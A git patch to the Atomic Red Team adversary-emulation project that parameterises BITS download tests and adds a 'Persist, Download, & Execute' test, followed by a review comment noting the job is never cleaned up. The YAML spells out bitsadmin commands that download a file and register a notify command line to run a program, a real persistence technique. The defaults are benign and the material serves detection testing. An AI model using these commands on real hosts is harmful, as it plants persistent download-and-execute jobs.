From 9a487bd26adb9e2ad904bfd9409d368f9babbf8b Mon Sep 17 00:00:00 2001
From: Tony M Lambert
Date: Tue, 4 Dec 2018 18:38:19 -0600
Subject: [PATCH] Added test for persistence via BITS (#409)

---
 atomics/T1197/T1197.yaml | 57 ++++++++++++++++++++++++++++++++++++++--
 1 file changed, 55 insertions(+), 2 deletions(-)

diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml
index 5381976f..ae4cf573 100644
--- a/atomics/T1197/T1197.yaml
+++ b/atomics/T1197/T1197.yaml
@@ -10,17 +10,70 @@ atomic_tests: supported_platforms: - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + local_file: + description: Local file path to save downloaded file + type: path + default: C:\Windows\Temp\bitsadmin_flag.ps1 executor: name: command_prompt command: | - bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1 + bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - name: Download & Execute via PowerShell BITS description: | This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell supported_platforms: - windows + input_arguments: + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + local_file: + description: Local file path to save downloaded file + type: path + default: C:\Windows\Temp\bitsadmin_flag.ps1 executor: name: powershell command: | - Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 + Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} + +- name: Persist, Download, & Execute + description: | + This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer + and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed. 
+ supported_platforms: + - windows + input_arguments: + bits_job_name: + description: Name of BITS job + type: string + default: AtomicBITS + remote_file: + description: Remote file to download + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md + local_file: + description: Local file path to save downloaded file + type: path + default: C:\Windows\Temp\bitsadmin_flag.ps1 + command_path: + description: Path of command to execute + type: path + default: C:\Windows\system32\notepad.exe + command_line: + description: Command line to execute + type: string + default: notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 + executor: + name: command_prompt + command: | + bitsadmin.exe /create #{bits_job_name} + bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} + bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line} + bitsadmin.exe /resume #{bits_job_name} \ No newline at end of file
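Review bot: The new "Persist, Download, & Execute" test leaves its BITS job behind after the run — the added description itself states the job stays in the BITS queue for 90 days if not removed — yet the patch adds no cleanup, so each execution leaves a live scheduled job with its `/setnotifycmdline` callback on the test host. I would document a cleanup step next to the executor, e.g. `bitsadmin.exe /cancel #{bits_job_name}`, to be run after the test has been observed rather than inside the test `command` (where it would defeat the persistence being exercised). A smaller issue: the `command_line` default `notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1` repeats the `local_file` default as a literal, so overriding `local_file` silently leaves the notify command pointing at the old path; a description such as `Command line to execute (path must match local_file)` would make the coupling explicit. The enclosing `atomic_tests` sequence and the `name` line of the first test begin above the hunk.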